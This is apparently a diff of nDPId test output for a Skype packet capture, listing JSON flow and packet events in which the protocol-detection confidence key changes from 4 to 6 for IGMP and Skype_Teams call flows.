00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1431969664357,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969664357,"pkt":"AQBeAAABoPPBbTu2CABGrAAgAAAAAAECgoTAqAD+4AAAAZQEAAARZO6bAAAAAA=="} -00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8z44AAEARX+vAqAEi1cezpTLdnEcAKEGUnAACQndt5hKcGQjs\/aUFepuMkaIJ9906aCWz4pv6M2E="} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyGYIAAEARfyPAqAEiQTffFDLdnGEAHnjQnAICuB3xnzqHf8BCJKQQ6ooGPwkzRg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3zjoAAEARkxnAqAEiQAQXlDLdnEoAI3yfnAQC5t7RxPpucIQEcbOpo3n\/i37I7X5QLz7O"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3gRQAAEARembAqAEib91NlDLdnF0AI32wnAYCAtkwZfUpvy0PrMgHjjv7gkQ5J07OrfdX"} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1GOEAAEAR4qLAqAEib91NjTLdnFQAIf21nAgChdWCG2VT3PvRM4JN\/HMVRe1geqFvmA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664990,"flow_last_seen":1431969664990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969664990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431969664990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969664990,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3tAAEAGNZTAqAEinTeCp8N9Abt3wuHVAAAAALAC\/\/8VHgAAAgQFtAEDAwUBAQgKPiLjQgAAAAAEAgAA"} 00538{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1431969665006,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431969665006,"pkt":"PBXCt3IOxCwDBkn+CABGAAAgivAAAAEC9ufAqAFc4AAA+5QEAAAWAAkE4AAA+wAAAAAAAAAAAAAAAAAA"} -00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1431969665118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665118,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIgG7w31xB6fgd8Lh1qASOJDOhQAAAgQFrAQCCApOq7dsPiLjQgEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1431969665118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665118,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0H2lAAEAGObLAqAEinTeCp8N9Abt3wuHWcQen4YAQECwlMAAAAQEICj4i48JOq7ds"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9S9AAEAGY\/DAqAEinTeClsN+nEtADbnoAAAAALAC\/\/\/YlwAAAgQFtAEDAwUBAQgKPiLk6gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1j8QAAEARCNrAqAEiQTffGDLdnGAAISuNnAoCfsB5JB\/rTYpH1Pyy3TEn61xOyU3n6Q=="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/Ev0AAEAR0ADAqAEinTc4rzLdnE0AK5vynAwCv2wYRcgby0Lpb\/j9BzqAbRO\/1tuxNgazREl3CBLvd3M="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0pwAAAEARuljAqAEiQAQXkjLdgQkAIJb3nA4CpT3k+\/yRRYMAziIEiKPZ4SNw4uYJ"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 